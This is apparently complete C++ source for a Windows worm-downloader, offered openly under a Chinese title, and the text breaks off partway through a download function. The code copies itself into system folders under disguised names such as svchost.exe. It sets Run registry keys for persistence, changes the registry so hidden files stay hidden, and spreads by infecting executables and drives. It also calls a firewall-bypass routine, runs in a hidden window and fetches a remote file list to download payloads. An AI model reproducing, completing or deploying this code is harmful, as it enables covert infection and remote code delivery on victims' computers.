webdown.cpp1

黑色技术蠕虫下载者的完整源码

// WebDown.cpp : Defines the entry point for the console application.
#include "stdafx.h"
#include "WebDown.h"
#include "worm.h"
#include <Dbt.h>
#pragma comment(lib,"LIBCTINY.LIB")//Create Mini Size
/////////////////////////////////////////////////////////////////////////////
struct MODIFY_DATA 
{
	char DownFile[100];//下载文件列表
	bool IsWorm;//是否感染EXE启动
	bool IsReg;//是否注册表启动
	bool IsUpan;//是否u盘传播
	bool IsShare;//是否共享传播
	bool IsAnti;//是否反查杀
	int WaitTime;//巡查时间（分钟）
}modify_data = 
{
	"http://127.0.0.1/down.list",
	false,
	false,
	false,
	false,
	false,
    1,
};

HWND hWnd;
char DownFileDate1[9]="88-88-88";
char DownFileDate2[9]="88-88-88";
/*解密数据函数*/
void DecryptRecord(char *szRec, unsigned long nLen, char *szKey)
{
	unsigned long i;
	char *p;

	p = szKey;

	for(i = 0; i < nLen; i++) {
		if(!(*p))
			p = szKey;

		*szRec -= *p;
		*szRec++ ^= *p++;
	}
}
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
	int nRetCode = 0; 
/*
	///自复制----------------------
	char SysDirBuff[256];
	char filename[256];
	char This_File[256];
	::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff));
	strcpy(filename,SysDirBuff);
	strcat(filename,"\\IME\\svchost.exe"); 
	GetModuleFileName(NULL, This_File, sizeof(This_File));
	
	if (_stricmp(This_File,filename)!=0)
	{
		DeleteFile(filename);
		if(::CopyFile(This_File,filename,FALSE)==0)	return -1;
		SetFileAttrib(filename);//隐藏了则不能拷贝？？
	}

	DecryptRecord((char*)&modify_data,sizeof(MODIFY_DATA),"1314");
*/
	//创建互斥量-----------------------------------
	HANDLE m_hMutex=CreateMutex(NULL,FALSE,"Alerter COM+");
	//检查错误代码
	if(GetLastError()==ERROR_ALREADY_EXISTS)
	{
		//如果已有互斥量存在则释放句柄并复位互斥量
		CloseHandle(m_hMutex);
		m_hMutex=NULL;
		//退出程序
		ExitProcess(0);
	}
	
	//开启感染线程，实施感染启动----------------------------
	if (modify_data.IsWorm)//
	{ 
		::CreateThread(NULL,0,Worm_thread,NULL,0,NULL);
	}

	//拷贝文件到各盘
	if(modify_data.IsUpan)
	{//搜索从C到Z各个盘符，感染每个磁盘。
		for (char cLabel='c'; cLabel<='z'; cLabel++)
		{
			char strRootPath[] = {"c:\\"};
			strRootPath[0] = cLabel;
			if(GetDriveType(strRootPath)== DRIVE_FIXED)
			{
				CopyToUAndSet(strRootPath);
			}
		}
	}
	//设置注册表
	if (modify_data.IsReg)
	{
		Register();
	}
	
	ByPassFireWall();
	CreateMyWindow();
	
	return nRetCode;
}

/************************************************/
int CreateMyWindow()
{
	MSG msg;
	WNDCLASS wndc;
	LPSTR szAppName="WebDown";
	wndc.style=0;
	wndc.lpfnWndProc=WndProc;
	wndc.cbClsExtra=0;
	wndc.cbWndExtra=0;
	wndc.hInstance=NULL;
	wndc.hIcon=NULL;
	wndc.hCursor=NULL;
	wndc.hbrBackground=(HBRUSH)(COLOR_WINDOW+1);
	wndc.lpszMenuName=NULL;
	wndc.lpszClassName=szAppName;
	RegisterClass(&wndc);
	hWnd=CreateWindow(szAppName,"Alerter COM+",
	WS_OVERLAPPEDWINDOW,
	CW_USEDEFAULT,CW_USEDEFAULT,
	CW_USEDEFAULT,CW_USEDEFAULT,
	NULL,NULL,NULL,NULL);
	ShowWindow(hWnd,SW_HIDE);
	UpdateWindow(hWnd);

	SendMessage(hWnd,WM_DEVICECHANGE,0,0);//检测有没有插入设备消息
	
	while(GetMessage(&msg,NULL,0,0))
	{
			TranslateMessage(&msg);
			DispatchMessage(&msg);
	}
	return 1;
}

BOOL Register()
{
	long  ret = 0;
	HKEY  hKEY;
	char  chCurPath[MAX_PATH];
	char  chSysPath[MAX_PATH];
	char  lpNewFileName1[MAX_PATH];
	char  lpNewFileName2[MAX_PATH];
	LPSTR lpCurFileName;
	DWORD dwType = REG_SZ;
	DWORD dwSize = MAX_PATH;
	char lpRegPath[256] = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";

	::GetSystemDirectory(chSysPath, dwSize);
	::GetModuleFileName(NULL, chCurPath, dwSize);
	
	//拷贝文件
	lpCurFileName = chCurPath;
	sprintf(lpNewFileName1, "%s\\internt.exe", chSysPath);
	SetFileAttrib(chSysPath);
	ret = CopyFile(lpCurFileName, lpNewFileName1, FALSE);
	sprintf(lpNewFileName2, "%s\\progmon.exe", chSysPath);
	SetFileAttrib(chSysPath);
	ret = CopyFile(lpCurFileName, lpNewFileName2, FALSE);
	//打开注册表键值
	ret = RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpRegPath, 0, KEY_WRITE, &hKEY);
	if(ret != ERROR_SUCCESS)
	{ 
		RegCloseKey(hKEY);
		return FALSE;
	}

	//设置注册表键值
	ret = RegSetValueEx(hKEY, "Internt", NULL, dwType, 
		(const unsigned char*)lpNewFileName1, dwSize);

	ret = RegSetValueEx(hKEY, "Program file", NULL, dwType, 
		(const unsigned char*)lpNewFileName2, dwSize);

	RegCloseKey(hKEY);

	//-----------------------
	DWORD dwData=0x00000000;
	char lpRegPath2[256] = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL";
	ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,lpRegPath2,0,KEY_READ|KEY_WRITE,&hKEY);
	if(ret != ERROR_SUCCESS)
	{ 
		RegCloseKey(hKEY);
		return FALSE;
	}	
	RegSetValueEx(hKEY,"CheckedValue",0,REG_DWORD,(LPBYTE)&dwData,sizeof(DWORD));
	RegCloseKey(hKEY);

	return TRUE;
}


///************************************************
bool GetDownFileDate(char Url[],char Date[])
{
	HMODULE hDll;
	LPVOID hInternet,hUrlHandle; 
	char buf[9];
	DWORD dwFlags;
	
	hDll = LoadLibrary("wininet.dll");
	if(hDll)
	{
		typedef LPVOID ( WINAPI * pInternetOpen ) (LPCTSTR ,DWORD ,LPCTSTR ,LPCTSTR ,DWORD );
		typedef LPVOID ( WINAPI * pInternetOpenUrl ) ( LPVOID ,LPCTSTR ,LPCTSTR ,DWORD ,DWORD ,DWORD);
		typedef BOOL ( WINAPI * pInternetCloseHandle ) ( LPVOID );
		typedef BOOL ( WINAPI * pInternetReadFile ) (LPVOID ,LPVOID ,DWORD ,LPDWORD) ;
		pInternetOpen InternetOpen=NULL;
		pInternetOpenUrl InternetOpenUrl=NULL;
		pInternetCloseHandle InternetCloseHandle=NULL;
		pInternetReadFile InternetReadFile=NULL;
		InternetOpen = ( pInternetOpen ) GetProcAddress( hDll, "InternetOpenA" );
		InternetOpenUrl = (pInternetOpenUrl ) GetProcAddress ( hDll, "InternetOpenUrlA");
		InternetCloseHandle = (pInternetCloseHandle) GetProcAddress (hDll,"InternetCloseHandle");
		InternetReadFile = (pInternetReadFile) GetProcAddress(hDll,"InternetReadFile");
		
		hInternet = InternetOpen("Alerter COM+",0, NULL, NULL, 0);
		if (hInternet != NULL)
		{
			hUrlHandle = InternetOpenUrl(hInternet, Url, NULL, 0, 0x04000000, 0);
			if (hUrlHandle!= NULL)
			{
				memset(buf,0,9);
				InternetReadFile(hUrlHandle, buf,8, &dwFlags);
				InternetCloseHandle(hUrlHandle);
				hUrlHandle = NULL;
			}
			InternetCloseHandle(hInternet);
			hInternet = NULL;
		}
		FreeLibrary(hDll);
		strcpy(Date,buf);
		return true;
	}
	else
		return false;
}
void DownFiles(char Url[])
{
	HMODULE hDll;
	LPVOID hInternet,hUrlHandle; 
	char buf[100],test[101];
	DWORD dwFlags,dwSize;
	
	hDll = LoadLibrary("wininet.dll");
	if(hDll)
	{
		typedef LPVOID ( WINAPI * pInternetOpen ) (LPCTSTR ,DWORD ,LPCTSTR ,LPCTSTR ,DWORD );
		typedef LPVOID ( WINAPI * pInternetOpenUrl ) ( LPVOID ,LPCTSTR ,LPCTSTR ,DWORD ,DWORD ,DWORD);
		typedef BOOL ( WINAPI * pInternetCloseHandle ) ( LPVOID );
		typedef BOOL ( WINAPI * pInternetReadFile ) (LPVOID ,LPVOID ,DWORD ,LPDWORD) ;
		pInternetOpen InternetOpen=NULL;
		pInternetOpenUrl InternetOpenUrl=NULL;
		pInternetCloseHandle InternetCloseHandle=NULL;
		pInternetReadFile InternetReadFile=NULL;
		InternetOpen = ( pInternetOpen ) GetProcAddress( hDll, "InternetOpenA" );
		InternetOpenUrl = (pInternetOpenUrl ) GetProcAddress ( hDll, "InternetOpenUrlA");
		InternetCloseHandle = (pInternetCloseHandle) GetProcAddress (hDll,"InternetCloseHandle");
		InternetReadFile = (pInternetReadFile) GetProcAddress(hDll,"InternetReadFile");
		
		hInternet = InternetOpen("Alerter COM+",0, NULL, NULL, 0);